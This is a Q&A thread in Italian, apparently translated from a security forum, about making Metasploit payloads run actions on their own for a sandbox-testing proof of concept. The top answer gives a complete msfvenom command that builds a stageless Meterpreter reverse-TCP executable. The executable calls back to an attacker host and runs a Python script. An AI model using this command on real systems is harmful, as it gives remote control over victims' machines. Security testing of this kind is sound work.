Come posso aggiungere moduli a un payload su Metasploit

3

So come creare payload usando Metasploit e poi script uno script AutoRun, quindi quando la macchina vittima si ricollega al mio Kali Server esegue alcune azioni. Funziona bene!

Quello che volevo fare è creare un carico utile armato di azioni (processo di creazione, modifica delle regole del firewall, controllo della VM, ecc.) in modo da poter eseguire azioni senza la necessità di riconnettermi al mio host Kali.

Sai se è possibile con Metasploit o Meterpreter? Nel caso in cui non sia possibile, c'è qualche app che posso usare per creare payload autonomi?

Questo è per un POC e l'intenzione è testare l'efficacia di alcune soluzioni di sandboxing.

    
posta Frosa 08.02.2015 - 16:00
fonte

2 risposte

2

Non sono sicuro di quanto tu abbia familiarità con l'ecosistema Meterpreter, ma se hai una certa esperienza, questo dovrebbe essere facile da ottenere attraverso i binding Python nel meterpreter stageless.

Il meterpreter stageless ha un attributo chiamato EXITINIT che può essere impostato su qualsiasi script python arbitrario e la sessione eseguirà i comandi anche prima che il gestore venga contattato. Perché ciò funzioni, è importante caricare l'estensione python. Entrambi questi compiti possono essere raggiunti attraverso:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> EXTENSIONS=stdapi,priv,python EXTINIT=python,/root/met.py -f exe -o met-stageless.exe

Come si può vedere, le EXTENSIONS sono impostate per caricare python che lo infornerà nell'EXE generato mentre EXITINIT caricherà l'estensione python (per default solo stapi è caricato) ed eseguirà i comandi specificati in / root / met .py file. Se puoi codificare un'azione in Python (praticamente qualsiasi cosa), puoi eseguirla attraverso l'estensione python.

    
risposta data 04.02.2016 - 10:23
fonte
0

Non ho esperienza reale, ma come si fa con i documenti Metasploit:

  • Staged Stager : i payload funzionano in combinazione con i payload della fase in ordine di eseguire un compito specifico. Uno stager stabilisce a canale di comunicazione tra l'attaccante e la vittima e legge in un payload dello stage da eseguire sull'host remoto.

Ma non riesco a capire se è necessario essere collegati alla vittima o meno. Esegue i payload nell'ordine dato in base a come la fase precedente viene eseguita localmente, o la decisione viene presa sulla tua macchina - e quindi devi essere connesso.

    
risposta data 08.02.2015 - 19:43
fonte

Leggi altre domande sui tag